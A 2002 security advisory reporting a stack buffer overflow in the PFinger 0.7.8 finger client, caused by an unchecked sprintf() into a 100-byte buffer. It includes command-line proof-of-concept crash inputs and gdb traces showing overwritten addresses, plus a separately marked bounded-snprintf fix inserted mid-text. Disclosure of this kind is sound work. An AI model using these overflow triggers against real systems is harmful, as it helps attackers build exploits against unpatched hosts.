PFinger Buffer Overflow Vulnerability.
* Affected version: PFinger v0.7.8 (http://www.xelia.ch/unix/pfinger/)
* Overview:
PFinger has an array bounds (buffer) overflow bug.
This one was found in the client.
Whether the server side is also vulnerable has not been confirmed.
Various similar bugs may exist anyway. :-(
* Description:
This happens when the array query (size 100) overflows.
The same result occurs with the -l, -d and -t options.
It is caused by an unsafe use of sprintf() (line 144).
=== pfinger-0.7.8/src/finger.c =================================
:
:
int main( int argc, char *argv[] )
{
    int flag;
    char *progname;
    int info = 0;
    char *hostname;
    char query[100];        /* fixed-size stack buffer */
    :
    :
        /* argv[optind] is copied into query[] with no length check */
        sprintf(query, "%s%s\r\n", (info) ? "/W_" : "", argv[optind]);
        ~~~~~~~~
        DoFinger1(hostname, query);
        optind++;
    }
:
:
================================================================
The stack is then laid out as follows:
query["xxxxxxxxxxxx...xxxxxx",'\r','\n','\0'];
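A bounded replacement for the query construction above, added here as an example (it is not part of this advisory and not PFinger's own code). It keeps the same 100-byte buffer size, uses snprintf() instead of sprintf(), and refuses the request when the user name plus the optional "/W_" prefix and "\r\n" would not fit. The helper names build_query() and query_length() are assumed for this example; the 130-byte 'x' argument is constructed to mirror the proof of concept.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Same buffer size as query[100] in pfinger-0.7.8 finger.c. */
#define QUERY_SIZE 100

/*
 * Build the finger request "[/W_]<user>\r\n" into out[outsz].
 * Returns the number of bytes written (excluding the NUL) on success,
 * or -1 if the request would not fit; in that case out[] is set to ""
 * so nothing half-built is sent.  This is the bounded form of the
 * unchecked sprintf() at line 144 (hypothetical helper, not PFinger code).
 */
int build_query(char *out, size_t outsz, int info, const char *user)
{
    int n;

    if (out == NULL || outsz == 0 || user == NULL)
        return -1;

    /* snprintf() never writes more than outsz bytes including the NUL and
     * returns the length the full string would have had, so a return value
     * >= outsz means the request was truncated. */
    n = snprintf(out, outsz, "%s%s\r\n", info ? "/W_" : "", user);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';          /* refuse rather than send a mangled query */
        return -1;
    }
    return n;
}

/*
 * Number of bytes the original sprintf() would have written (excluding
 * the NUL).  Shows why a 130-byte argument overruns query[100].
 */
size_t query_length(int info, const char *user)
{
    return (info ? 3 : 0) + strlen(user) + 2;
}

int main(void)
{
    char query[QUERY_SIZE];
    char longuser[131];         /* constructed: 130 'x' bytes, like the PoC */

    memset(longuser, 'x', 130);
    longuser[130] = '\0';

    printf("query_length(\"alice\")   = %zu\n", query_length(0, "alice"));
    printf("query_length(130 x 'x') = %zu (buffer is %d)\n",
           query_length(1, longuser), QUERY_SIZE);

    if (build_query(query, sizeof query, 0, "alice") >= 0)
        printf("ok: %s", query);
    if (build_query(query, sizeof query, 1, longuser) < 0)
        printf("rejected: user name too long for %d-byte request buffer\n",
               QUERY_SIZE);
    return 0;
}
```

The check on the snprintf() return value is the important part: snprintf() alone only stops the overflow, while the return value tells the caller the request was truncated so it can reject it instead of sending a query that no longer ends in "\r\n".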
* Proof of concept:
[x82_at_xpl017elz src]$ ./finger `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82_at_xpl017elz src]$ ./finger -l `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82_at_xpl017elz src]$ ./finger -d `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82_at_xpl017elz src]$ ./finger -t `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82_at_xpl017elz src]$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
[x82_at_xpl017elz src]$
- Debugging -
[x82_at_xpl017elz src]$ gdb -q ./finger
(gdb) r -l `perl -e 'print "x"x100'`
Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
x"x100'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Program received signal SIGSEGV, Segmentation fault.
0x4005000a in _ufc_foobar () from /lib/libc.so.6
(gdb) r -l `perl -e 'print "x"x101'`
Program received signal SIGSEGV, Segmentation fault.
0x40000a0d in syslog_mem () from /lib/ld-linux.so.2
(gdb) r -l `perl -e 'print "x"x102'`
Program received signal SIGSEGV, Segmentation fault.
0xa0d78 in ?? ()
(gdb)
(gdb) r -l `perl -e 'print "x"x105'`
Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
x"x105'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Program received signal SIGSEGV, Segmentation fault.
0x400a4b53 in strrchr () from /lib/libc.so.6
(gdb) where
#0 0x400a4b53 in strrchr () from /lib/libc.so.6
#1 0xbffff564 in ?? ()
#2 0x78787878 in ?? ()
Cannot access memory at address 0x78787878.
(gdb)
P.S.: Sorry for my poor English.
__
By "dong-houn yoU" (Xpl017Elz), in INetCop(c).
E-mail: szoahc_at_hotmail.com
Home: http://x82.i21c.net
Received on Jun 04 2002